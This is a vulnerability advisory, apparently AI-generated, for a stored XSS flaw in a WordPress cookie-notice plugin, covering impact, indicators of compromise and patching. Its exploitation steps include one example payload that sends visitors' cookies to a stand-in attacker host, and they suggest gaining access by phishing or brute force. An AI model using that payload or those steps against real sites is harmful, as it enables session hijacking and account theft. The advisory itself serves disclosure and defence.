CVE-2025-67554
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-67554 is a Stored Cross-Site Scripting (XSS) vulnerability in the "Cookie Notice & Compliance for GDPR / CCPA" WordPress plugin developed by Humanityco. It affects all plugin versions up to and including 2.5.8, and was reported by researcher Peter Thaleikis on September 21, 2025, with public disclosure on October 21, 2025. The vulnerability was assigned a CVSS v3.1 base score of 5.9 (Medium) (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the stored (persistent) variant. An attacker with Author or Developer-level privileges can inject malicious scripts into plugin settings or content fields that are subsequently stored in the database and rendered to site visitors without proper sanitization or output escaping. Exploitation requires user interaction from a privileged user (e.g., an administrator visiting a crafted page), and the vulnerability has a changed scope, meaning injected scripts can affect users in a different security context than the attacker's (Patchstack).

Impact

Successful exploitation allows a malicious actor to inject persistent JavaScript or HTML payloads into the WordPress site, which execute in the browsers of visiting users, including administrators. This can lead to session hijacking, credential theft, unauthorized redirects, defacement, or delivery of malicious advertisements to site visitors. The changed scope means the impact extends beyond the attacker's privilege level, potentially affecting all users who visit pages where the malicious content is rendered (Patchstack).

Exploitability

No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. Exploitation requires high privileges (Author/Developer role) and user interaction, which significantly limits the attack surface. Patchstack classifies this as low priority with no impactful threat currently observed, and it is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the "Cookie Notice & Compliance for GDPR / CCPA" plugin version 2.5.8 or earlier, using tools like WPScan or by inspecting plugin metadata in page source.
  2. Obtain privileged access: Gain Author or Developer-level access to the target WordPress site (e.g., through credential theft, phishing, or brute force).
  3. Inject malicious payload: Navigate to the plugin's settings or a content field that is rendered without proper output escaping, and insert a stored XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Trigger execution: The payload is stored in the database and executes automatically in the browser of any user (including administrators) who visits the affected page, enabling session hijacking or further exploitation (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to plugin settings pages from unexpected user accounts or IP addresses; database audit logs showing unexpected modifications to plugin option values.
  • File System: Unexpected changes to plugin configuration stored in the wp_options table, particularly fields associated with the cookie-notice plugin containing <script> tags or encoded JavaScript.
  • Network: Outbound requests from site visitors' browsers to unknown external domains shortly after visiting pages with cookie notice banners; unusual JavaScript loaded from third-party domains in browser developer tools.
  • Process/Behavior: Unexpected redirects or pop-ups appearing on the site's frontend for all visitors, or administrator sessions being hijacked following visits to affected pages (Patchstack).

Mitigation and workarounds

The vulnerability is patched in version 2.5.9 of the Cookie Notice & Compliance for GDPR / CCPA plugin. Site administrators should update the plugin to version 2.5.9 or later immediately via the WordPress admin dashboard. If an immediate update is not possible, restricting Author/Developer-level user accounts and reviewing plugin settings for unexpected script content are recommended interim measures. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-19848MEDIUM6.5
  • wp-user-avatar
NoYesAug 21, 2026
CVE-2026-17559MEDIUM5.3
  • content-protector
NoYesAug 21, 2026
CVE-2026-16650MEDIUM5.3
  • charitable
NoYesAug 21, 2026
CVE-2026-15150MEDIUM5.3
  • mycred
NoYesAug 21, 2026
CVE-2026-18356LOW3.7
  • limit-login-attempts-reloaded
NoYesAug 21, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management